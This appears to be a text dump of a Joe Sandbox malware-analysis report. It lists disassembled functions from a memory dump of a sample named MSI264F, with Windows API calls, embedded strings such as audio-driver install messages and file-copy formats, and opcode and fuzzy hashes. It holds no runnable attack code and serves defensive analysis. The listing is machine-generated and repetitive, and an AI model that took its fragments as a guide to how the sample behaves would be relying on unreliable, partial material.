                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Move$Copy
                                                                                                                        • String ID: .new$Copy %s to %s$pcigina
                                                                                                                        • API String ID: 2731655860-4090019360
                                                                                                                        • Opcode ID: 34f0c56b1ee8cddd37931609ddaf4f682b29ed81125528feeed537672636c4e9
                                                                                                                        • Instruction ID: 5d371127311a4600860a6f9435da048dc0ad87eb474b5768de137a08c6fffa62
                                                                                                                        • Opcode Fuzzy Hash: 34f0c56b1ee8cddd37931609ddaf4f682b29ed81125528feeed537672636c4e9
                                                                                                                        • Instruction Fuzzy Hash: 7C21C9B6E4021856C7309B58DD42BE673FCEF54710F1004E5FB09971C1DAB59984CBA2
                                                                                                                        Function 00B22200 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • BeginPaint.USER32(?,?), ref: 00B2225C
                                                                                                                        • EndPaint.USER32(?,?), ref: 00B22267
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B3CC21: _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B2228E
                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,000000FF), ref: 00B2229B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Paintwsprintf$BeginFreeGlobalLocalProcTimeWindow_doexit_mallocwvsprintf
                                                                                                                        • String ID: Create main window$Destroy Window
                                                                                                                        • API String ID: 1819889169-300420290
                                                                                                                        • Opcode ID: b343610c3ab5caf6fe4f6cffad418fd2220c99eabe080fa31be9a4bd935542d2
                                                                                                                        • Instruction ID: 38b8da80a654aaf8db5fc54f2fbdedf04842e7a4b577ae79faddb844ba64cb23
                                                                                                                        • Opcode Fuzzy Hash: b343610c3ab5caf6fe4f6cffad418fd2220c99eabe080fa31be9a4bd935542d2
                                                                                                                        • Instruction Fuzzy Hash: 5911E275900229FBCB14EFA8AC868BE77F8EB09714F1000A6F40DE3251DE719C05DBA2
                                                                                                                        Function 00AF0E00 Relevance: 10.6, APIs: 7, Instructions: 64COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E24
                                                                                                                          • Part of subcall function 00B391A1: RaiseException.KERNEL32(00B3367E,00B82978,00000000,?,00B3367E,00B82978,?,00B32ECB,00000000,?,00B3367E,?), ref: 00B391E3
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0E48
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E63
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0E82
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0E9D
                                                                                                                        • std::exception::exception.LIBCMT ref: 00AF0EB7
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00AF0ED2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4237746311-0
                                                                                                                        • Opcode ID: cb52dc45228a2a7a6ebfdb9d1f49a8a0cb023879287031e0fb1f6a37ea7eac88
                                                                                                                        • Instruction ID: dc6e2fbf0fd296f642c7d0c9c51a0c9b85a7f2350301b0c8d49e8067c5e97e4b
                                                                                                                        • Opcode Fuzzy Hash: cb52dc45228a2a7a6ebfdb9d1f49a8a0cb023879287031e0fb1f6a37ea7eac88
                                                                                                                        • Instruction Fuzzy Hash: 342141B2C00209AECB55EFD8C545BEEBBF4AF44340F248489F915B7251DBB59B48CB62
                                                                                                                        Function 00B241B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60stringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(?,?,00B6F4D8,?,00000010,?), ref: 00B241E4
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B241FA
                                                                                                                        • lstrcmpiW.KERNEL32(00000001,00B7250C), ref: 00B24215
                                                                                                                        • lstrcmpiW.KERNEL32(00000001,Yes), ref: 00B24224
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpi$PrivateProfileString__wcsicoll
                                                                                                                        • String ID: True$Yes
                                                                                                                        • API String ID: 769013191-1480529194
                                                                                                                        • Opcode ID: b3c871001e6b138425fdaf22399bda85b7a2e7aca6644beb27afb479ed9c5327
                                                                                                                        • Instruction ID: 1addc0aab26bc899de568f5c64ad7936318d27eef63ffe60af25f51f49d86e9f
                                                                                                                        • Opcode Fuzzy Hash: b3c871001e6b138425fdaf22399bda85b7a2e7aca6644beb27afb479ed9c5327
                                                                                                                        • Instruction Fuzzy Hash: 0C11B231911218ABCB04EFA09D45AEA7BF8EB48700F5040D8F808A7680DFB1ED44C7E1
                                                                                                                        Function 00B4C9E7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name::operator+$NameName::
                                                                                                                        • String ID: throw(
                                                                                                                        • API String ID: 168861036-3159766648
                                                                                                                        • Opcode ID: 7c23f0207233621169b564912255a0f38641afad478a01d314e73c873eac789e
                                                                                                                        • Instruction ID: 1c7549080b5e15367850ae476c42989007de431748a480bb181376777676a86e
                                                                                                                        • Opcode Fuzzy Hash: 7c23f0207233621169b564912255a0f38641afad478a01d314e73c873eac789e
                                                                                                                        • Instruction Fuzzy Hash: 01012D71A01209AFCF04DFA4D846DAD3FF5EB44B44F004099B515AB2A5DB70DB45AB94
                                                                                                                        Function 00B1D0B0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B192B0: GetVersionExW.KERNEL32(00B8BEF0,?), ref: 00B192E0
                                                                                                                          • Part of subcall function 00B192B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 00B1931F
                                                                                                                          • Part of subcall function 00B192B0: _memset.LIBCMT ref: 00B19343
                                                                                                                          • Part of subcall function 00B192B0: _wcsncpy.LIBCMT ref: 00B1941B
                                                                                                                        • LoadLibraryW.KERNEL32(shcore.dll), ref: 00B1D0CF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 00B1D0F3
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B1D103
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$AddressFreeLoadOpenProcVersion_memset_wcsncpy
                                                                                                                        • String ID: SetProcessDPIAwareness(%d)$SetProcessDpiAwareness$shcore.dll
                                                                                                                        • API String ID: 2514811097-152109829
                                                                                                                        • Opcode ID: 200e8cca1d95536a56cf5384afd6a351cb45c0bff080a5fe90d314e3825eab9b
                                                                                                                        • Instruction ID: ee212995c4ac92cb655b960b8218f415e2fd09f7f6ca026619e221980bf6b4f8
                                                                                                                        • Opcode Fuzzy Hash: 200e8cca1d95536a56cf5384afd6a351cb45c0bff080a5fe90d314e3825eab9b
                                                                                                                        • Instruction Fuzzy Hash: A1F0BB327822117BE7102A6D7C86BDA77DCDB81B75F040265F91CE22D1DA958D5081F5
                                                                                                                        Function 00B42A5E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B83318,00000008,00B42B66,00000000,00000000,?,00B097EE,00000000,?,?), ref: 00B42A6F
                                                                                                                        • __lock.LIBCMT ref: 00B42AA3
                                                                                                                          • Part of subcall function 00B492EA: __mtinitlocknum.LIBCMT ref: 00B49300
                                                                                                                          • Part of subcall function 00B492EA: __amsg_exit.LIBCMT ref: 00B4930C
                                                                                                                          • Part of subcall function 00B492EA: EnterCriticalSection.KERNEL32(?,?,?,00B42AA8,0000000D,?,00B097EE,00000000,?,?), ref: 00B49314
                                                                                                                        • InterlockedIncrement.KERNEL32(00B88D80), ref: 00B42AB0
                                                                                                                        • __lock.LIBCMT ref: 00B42AC4
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00B42AE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                        • String ID: KERNEL32.DLL
                                                                                                                        • API String ID: 637971194-2576044830
                                                                                                                        • Opcode ID: a65815a082500264cf062370be5b0eb68aa9c00534ae8062d00a8aa6f139584b
                                                                                                                        • Instruction ID: 4d2ffecc7b3269febe778e610f93b2082e492cb1b131879c4039bceeff34b597
                                                                                                                        • Opcode Fuzzy Hash: a65815a082500264cf062370be5b0eb68aa9c00534ae8062d00a8aa6f139584b
                                                                                                                        • Instruction Fuzzy Hash: 4E014471440B00EBD720AF65D845749BBE0EF54724F50898DF499573E1CBB4AA44DF19
                                                                                                                        Function 00B446E1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00B44702
                                                                                                                          • Part of subcall function 00B42B8B: __getptd_noexit.LIBCMT ref: 00B42B8E
                                                                                                                          • Part of subcall function 00B42B8B: __amsg_exit.LIBCMT ref: 00B42B9B
                                                                                                                        • __getptd.LIBCMT ref: 00B44713
                                                                                                                        • __getptd.LIBCMT ref: 00B44721
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                        • String ID: MOC$RCC$csm
                                                                                                                        • API String ID: 803148776-2671469338
                                                                                                                        • Opcode ID: 79fd4394c1a316bb9246424b00d296bf4e25730480433ee22ea039a0698858cd
                                                                                                                        • Instruction ID: 1008aa7196d2254de070723df4a8cfdb722b78651f80a60802b679c5802dbd68
                                                                                                                        • Opcode Fuzzy Hash: 79fd4394c1a316bb9246424b00d296bf4e25730480433ee22ea039a0698858cd
                                                                                                                        • Instruction Fuzzy Hash: E0E092355141048FDB209FB4C18A76837D4FB99355F5544E1E44DC7323DB28EE617A53
                                                                                                                        Function 00B14C30 Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 00B14C8B
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00B14CAC
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B14CD8
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00B14CF9
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00B14D01
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000000,00000000,00000000), ref: 00B14D1B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharFileMultiWide$CreateModuleNameQueryVirtual__alloca_probe_16
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2073682827-0
                                                                                                                        • Opcode ID: a7f70049f8fd7fe78016e7120eeb1ffadf5136c1d297157528abc53999ffbb1d
                                                                                                                        • Instruction ID: 2726cda0da87f40f84d54399a88e1864fc70d7b847899beba02c77f2a0b0961a
                                                                                                                        • Opcode Fuzzy Hash: a7f70049f8fd7fe78016e7120eeb1ffadf5136c1d297157528abc53999ffbb1d
                                                                                                                        • Instruction Fuzzy Hash: 72318471600214ABEB20CB60CC45FAA77B8EB85710F604298B618AB2C0DFB1AD41CB95
                                                                                                                        Function 00B2E316 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$FullNamePath__wcsdup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1390683719-0
                                                                                                                        • Opcode ID: 558435c02b595510b33d9bfe041e196382d1147e66b4215ffb4ea1117ce9b48e
                                                                                                                        • Instruction ID: da18ce4fff0e490aec4eae112980eead69e5a634483b2a72cb2e3cab398a82c8
                                                                                                                        • Opcode Fuzzy Hash: 558435c02b595510b33d9bfe041e196382d1147e66b4215ffb4ea1117ce9b48e
                                                                                                                        • Instruction Fuzzy Hash: 63317A7280023083CB319B25AC416AD73F5EF45700F1946EAE1AEA72E1EB709D858797
                                                                                                                        Function 00B08529 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$FreeUnlock$DeleteObject$_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 938152311-0
                                                                                                                        • Opcode ID: 0240b7f4abea4099aba78ba79c8c81c3263ab0cf1655978e31120f90ed2e59ea
                                                                                                                        • Instruction ID: ab82b7280918da7ff6c9f0557f79ba20978acfa9eea68a5e6a1fb393ff2e4bf5
                                                                                                                        • Opcode Fuzzy Hash: 0240b7f4abea4099aba78ba79c8c81c3263ab0cf1655978e31120f90ed2e59ea
                                                                                                                        • Instruction Fuzzy Hash: 55316F71D04258ABCB15DBA0DC84AEEBFB5EF65314F5580D9E88467382DB34AE41CBA0
                                                                                                                        Function 00B2E8CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 75COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00AEAD70: GetLastError.KERNEL32 ref: 00AEADB9
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E91B
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E99D
                                                                                                                        Strings
                                                                                                                        • restart audio ret %d, xrefs: 00B2E95E
                                                                                                                        • Remove audio driver ret %d, e=%d, xrefs: 00B2E923
                                                                                                                        • Attempting to restart audio, xrefs: 00B2E944
                                                                                                                        • Install audio driver ret x%x, e=%d, xrefs: 00B2E9A5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Attempting to restart audio$Install audio driver ret x%x, e=%d$Remove audio driver ret %d, e=%d$restart audio ret %d
                                                                                                                        • API String ID: 1452528299-2276465569
                                                                                                                        • Opcode ID: 97b5eba1575d68187b57715438d0c66a01561db06702517b3cc83387f0004330
                                                                                                                        • Instruction ID: 7539a7218fe8187b36e9756821ccda6c428c025cc20a1b79ec0de8762f7d3429
                                                                                                                        • Opcode Fuzzy Hash: 97b5eba1575d68187b57715438d0c66a01561db06702517b3cc83387f0004330
                                                                                                                        • Instruction Fuzzy Hash: 4D21AA72D010245ACB64FBA5BD92BBE73E4DB50300F0040FBF91E92192EA716DC48AA2
                                                                                                                        Function 00B094C0 Relevance: 9.1, APIs: 6, Instructions: 63fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00B094D8
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B094FA
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B09516
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B0951D
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B09524
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$CloseCreateFileFreeHandleLockUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1361453894-0
                                                                                                                        • Opcode ID: 67601b83f1fb0670f96dcbdd5325b48be7b49538e6359675492c83293854ef14
                                                                                                                        • Instruction ID: 73a2443eecf5abfc124efab98315ec4a49fbe112a131300c2c56ae798b2b130b
                                                                                                                        • Opcode Fuzzy Hash: 67601b83f1fb0670f96dcbdd5325b48be7b49538e6359675492c83293854ef14
                                                                                                                        • Instruction Fuzzy Hash: D401D672701204BBD7209BA8BC49FAEBBACEF46725F1001A5FD04D73D0DAB45E1186A5
                                                                                                                        Function 00B06E40 Relevance: 9.1, APIs: 6, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00B06E59
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 00B06E77
                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00B06E80
                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 00B06E91
                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00B06EA1
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00B06EAA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
